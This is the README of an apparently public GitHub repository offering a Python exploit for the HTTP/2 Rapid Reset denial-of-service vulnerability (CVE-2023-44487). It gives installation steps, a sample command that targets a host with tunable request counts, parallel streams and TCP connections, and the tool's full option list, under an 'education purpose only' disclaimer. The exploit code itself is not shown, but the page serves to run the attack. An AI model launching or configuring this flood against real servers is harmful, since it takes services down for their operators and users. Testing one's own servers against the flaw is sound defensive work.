/CVE-2023-44487

A python based exploit to test out rapid reset attack (CVE-2023-44487)

Primary LanguagePythonApache License 2.0Apache-2.0

HTTP2 Rapid Reset Attack: CVE-2023-44487

Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only

Exploit:

Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only

Table of Contents

Installation

Clone the repository to your local machine using Git, install poetry, and run the program:

git clone https://github.com/studiogangster/CVE-2023-44487.git

cd CVE-2023-44487

 # install Poetry, if you haven't already:
 curl -sSL https://install.python-poetry.org | python -
 
 # poetry install
 poetry install

 # Activate the virtual environment created by Poetry:
 poetry shell

 # Run Help
 python main.py

## Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100  --max_streams 20 --parallel_connections 2

Usage

Usage: main.py [OPTIONS]

Options:
  --host TEXT                     Host URL  [required]
  --path TEXT                     Path on the host  [required]
  --headers TEXT                  Headers (comma-separated)  [required]
  --port INTEGER                  Port number  [required]
  --requests_count INTEGER        Number of requests to be sent  [required]
  --max_streams INTEGER           Maximum streams to be opened in parallel
                                  [required]
  --parallel_connections INTEGER  Number of parallel connections to be made
                                  with the server. (TCP connection)
                                  [required]
  --help                          Show this message and exit.